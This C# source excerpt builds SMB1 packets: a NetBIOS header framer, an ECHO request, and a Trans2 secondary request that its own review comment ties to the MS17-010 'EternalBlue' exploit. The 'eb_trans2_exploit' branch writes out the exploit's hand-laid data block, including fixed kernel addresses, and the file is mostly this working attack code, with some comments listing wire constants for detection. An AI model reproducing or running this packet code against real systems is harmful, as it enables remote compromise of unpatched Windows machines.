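        /// <summary>
        /// Prepends a 4-byte NetBIOS session header to <paramref name="pkt"/>.
        /// The header is a single 32-bit field in which the high byte is the message type
        /// (0x00 = session message) and the low three bytes carry the big-endian length.
        /// </summary>
        /// <param name="pkt">The SMB message to frame.</param>
        /// <returns>A new array holding the header followed by <paramref name="pkt"/>.</returns>
        /// <exception cref="ArgumentNullException"><paramref name="pkt"/> is null.</exception>
        /// <exception cref="ArgumentOutOfRangeException">
        /// <paramref name="pkt"/> is longer than 0x00FFFFFF bytes; a longer length would spill
        /// into the message-type byte and silently produce a malformed frame.
        /// </exception>
        static public byte[] SetNetBiosHeader(byte[] pkt)
        {
            if (pkt == null)
            {
                throw new ArgumentNullException("pkt");
            }

            // The length is byte-reversed into wire (big-endian) order below, so its most
            // significant byte occupies the message-type slot of the shared 32-bit field.
            // Only lengths that fit in 24 bits keep that byte at 0x00.
            if (pkt.Length > 0x00FFFFFF)
            {
                throw new ArgumentOutOfRangeException("pkt", pkt.Length, "NetBIOS session length must fit in 24 bits");
            }

            uint size = (uint)pkt.Length;

            byte[] lengthBytes = BitConverter.GetBytes(size);
            Array.Reverse(lengthBytes); // big-endian on the wire

            NETBIOS_HEADER netbiosHeader = new NETBIOS_HEADER
            {
                MessageTypeAndSize = BitConverter.ToUInt32(lengthBytes, 0)
            };

            return GetBytes(netbiosHeader).Concat(pkt).ToArray();
        }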
        /// <summary>
        /// Builds a complete SMB1 ECHO request frame: NetBIOS session header, SMB header,
        /// ECHO request parameters and a 12-byte data block.
        /// </summary>
        /// <param name="TID">Tree identifier copied into the SMB header.</param>
        /// <param name="UID">User identifier copied into the SMB header.</param>
        /// <returns>The serialised frame, ready to be written to the session socket.</returns>
        static public byte[] MakeSMB1EchoPacket(ushort TID, ushort UID)
        {
            // Fixed-size frame; the length encoded here already accounts for the 12 data bytes below.
            NETBIOS_HEADER sessionHeader = new NETBIOS_HEADER { MessageTypeAndSize = 0x31000000 };

            SMB_HEADER smbHeader = new SMB_HEADER
            {
                protocol         = 0x424d53ff, // "\xffSMB" in little-endian byte order
                command          = 0x2b,       // SMB_COM_ECHO
                errorClass       = 0x00,
                _reserved        = 0x00,
                errorCode        = 0x0000,
                flags            = 0x98,
                flags2           = 0xc007,
                PIDHigh          = 0x0000,
                SecurityFeatures = 0x0000000000000000,
                reserved         = 0x0000,
                TID    = TID,
                PIDLow = 0xfeff,
                UID    = UID,
                MID    = 0x0040
            };

            // Echo data: eleven 'A' bytes followed by a terminating zero.
            byte[] echoData = Enumerable.Repeat((byte)0x41, 11)
                                        .Concat(new byte[] { 0x00 })
                                        .ToArray();

            SMB_COM_ECHO_REQUEST echoRequest = new SMB_COM_ECHO_REQUEST
            {
                WordCount          = 0x1,
                EchoSequenceNumber = 0x0001,
                ByteCount          = (ushort)echoData.Length
            };

            // Serialise in wire order: NetBIOS header, SMB header, ECHO parameters, data.
            return GetBytes(sessionHeader)
                   .Concat(GetBytes(smbHeader))
                   .Concat(GetBytes(echoRequest))
                   .Concat(echoData)
                   .ToArray();
        }
        /// <summary>
        /// Builds an SMB1 TRANSACTION2_SECONDARY request whose declared 0x1000-byte data block is
        /// followed by one of three hard-coded payload variants selected by <paramref name="type"/>.
        /// NOTE(review): going by the "eb_" names this looks like the MS17-010 ("EternalBlue") Trans2
        /// request family - confirm against the caller. For detection purposes, the constants this
        /// builder fixes on the wire are: command 0x33, flags 0x18, flags2 0xc007, PIDLow 0xfeff,
        /// MID 0x0040, and TotalDataCount / DataCount / ByteCount of 0x1000.
        /// </summary>
        /// <param name="TID">Tree identifier copied into the SMB header.</param>
        /// <param name="UID">User identifier copied into the SMB header.</param>
        /// <param name="type">
        /// Payload selector: "eb_trans2_exploit", "eb_trans2_zero", or any other value for a plain
        /// 0x41 filler. A null value throws <c>NullReferenceException</c> at the first <c>Equals</c>.
        /// </param>
        /// <param name="time">Scaled into <c>timeout</c> below; only the low byte of that result is used.</param>
        /// <returns>The complete frame: NetBIOS header, SMB header, Trans2 secondary parameters, payload.</returns>
        static public byte[] MakeSMB1Trans2ExploitPacket(ushort TID, ushort UID, string type, int time)
        {
            // Fixed-size frame header; same encoding as the 0x31000000 value used by the echo builder,
            // presumably marshalled little-endian by GetBytes (type byte 0x00, length 0x1035) - confirm.
            NETBIOS_HEADER NTHeader = new NETBIOS_HEADER
            {
                MessageTypeAndSize = 0x35100000
            };

            SMB_HEADER header = new SMB_HEADER
            {
                protocol         = 0x424d53ff, // "\xffSMB" in little-endian byte order
                command          = 0x33,       // SMB_COM_TRANSACTION2_SECONDARY
                errorClass       = 0x00,
                _reserved        = 0x00,
                errorCode        = 0x0000,
                flags            = 0x18,
                flags2           = 0xc007,
                PIDHigh          = 0x0000,
                SecurityFeatures = 0x0000000000000000,
                reserved         = 0x0000,
                TID    = TID,
                PIDLow = 0xfeff,
                UID    = UID,
                MID    = 0x0040
            };

            byte[] headerBytes = GetBytes(NTHeader).Concat(GetBytes(header)).ToArray();

            // Every count field is fixed; only DataDisplacement is derived from the caller's input.
            SMB_COM_TRANSACTION2_SECONDARY_REQUEST transaction2SecondaryRequest = new SMB_COM_TRANSACTION2_SECONDARY_REQUEST
            {
                WordCount             = 0x09,
                TotalParameterCount   = 0x0102,
                TotalDataCount        = 0x1000,
                ParameterCount        = 0x0000,
                ParameterOffset       = 0x0000,
                ParameterDisplacement = 0x0000,
                DataCout         = 0x1000,
                DataOffset       = 0x0035,
                DataDisplacement = 0x0000, //we change this with our timeout int later
                FID       = 0x0000,
                ByteCount = 0x1000
            };
            // Scale the caller's value; only the least significant byte survives into the packet.
            int timeout = (time * 16) + 3;

            // Little-endian ushort: low byte 0xd0, high byte = low byte of timeout.
            transaction2SecondaryRequest.DataDisplacement = BitConverter.ToUInt16(new byte[] { 0xd0, BitConverter.GetBytes(timeout)[0] }, 0);
            //Merge SMBHeader with the transaction2SecondaryRequest
            byte[] transaction2SecondaryRequestBytes = GetBytes(transaction2SecondaryRequest);
            byte[] pkt = headerBytes.Concat(transaction2SecondaryRequestBytes).ToArray();

            // Variant 1: hand-laid data block (zero padding interleaved with fixed byte runs, then 0x41 filler).
            if (type.Equals("eb_trans2_exploit"))
            {
                List <byte> SMBData = new List <byte>();

                SMBData.AddRange(Enumerable.Repeat((byte)0x00, 2957));
                SMBData.AddRange(new List <byte>()
                {
                    0x80, 0x00, 0xa8, 0x00
                });
                SMBData.AddRange(Enumerable.Repeat((byte)0x00, 16));
                SMBData.AddRange(new List <byte>()
                {
                    0xff, 0xff
                });
                SMBData.AddRange(Enumerable.Repeat((byte)0x00, 6));
                SMBData.AddRange(new List <byte>()
                {
                    0xff, 0xff
                });
                SMBData.AddRange(Enumerable.Repeat((byte)0x00, 22));
                SMBData.AddRange(new List <byte>()
                {
                    0x00, 0xf1, 0xdf, 0xff // x86 addresses
                });
                SMBData.AddRange(Enumerable.Repeat((byte)0x00, 8));
                SMBData.AddRange(new List <byte>()
                {
                    0x20, 0xf0, 0xdf, 0xff, 0x00, 0xf1, 0xdf, 0xff, 0xff, 0xff, 0xff, 0xff, 0x60, 0x00, 0x04, 0x10
                });
                SMBData.AddRange(Enumerable.Repeat((byte)0x00, 4));
                SMBData.AddRange(new List <byte>()
                {
                    0x80, 0xef, 0xdf, 0xff
                });
                SMBData.AddRange(Enumerable.Repeat((byte)0x00, 4));
                SMBData.AddRange(new List <byte>()
                {
                    0x10, 0x00, 0xd0, 0xff, 0xff, 0xff, 0xff, 0xff, 0x18, 0x01, 0xd0, 0xff, 0xff, 0xff, 0xff, 0xff
                });
                SMBData.AddRange(Enumerable.Repeat((byte)0x00, 0x10));
                SMBData.AddRange(new List <byte>()
                {
                    0x60, 0x00, 0x04, 0x10
                });
                SMBData.AddRange(Enumerable.Repeat((byte)0x00, 0xc));
                SMBData.AddRange(new List <byte>()
                {
                    0x90, 0xff, 0xcf, 0xff, 0xff, 0xff, 0xff, 0xff
                });
                SMBData.AddRange(Enumerable.Repeat((byte)0x00, 0x8));
                SMBData.AddRange(new List <byte>()
                {
                    0x80, 0x10
                });
                SMBData.AddRange(Enumerable.Repeat((byte)0x00, 0xe));
                SMBData.AddRange(new List <byte>()
                {
                    0x39, 0xbb
                });
                SMBData.AddRange(Enumerable.Repeat((byte)0x41, 965));
                pkt = pkt.Concat(SMBData.ToArray()).ToArray();
                return(pkt);
            }

            // Variant 2: zero padding, two fixed bytes, then 0x41 filler.
            if (type.Equals("eb_trans2_zero"))
            {
                List <byte> SMBData = new List <byte>();
                SMBData.AddRange(Enumerable.Repeat((byte)0x00, 2055));
                SMBData.Add(0x83);
                SMBData.Add(0xf3);
                SMBData.AddRange(Enumerable.Repeat((byte)0x41, 2039));
                pkt = pkt.Concat(SMBData.ToArray()).ToArray(); //Collect it all
                return(pkt);
            }
            else
            {
                // Default for any other type string: a plain 0x1000-byte block of 0x41.
                List <byte> SMBData = new List <byte>();
                SMBData.AddRange(Enumerable.Repeat((byte)0x41, 4096));
                pkt = pkt.Concat(SMBData.ToArray()).ToArray(); //Collect it all
            }

            return(pkt);
        }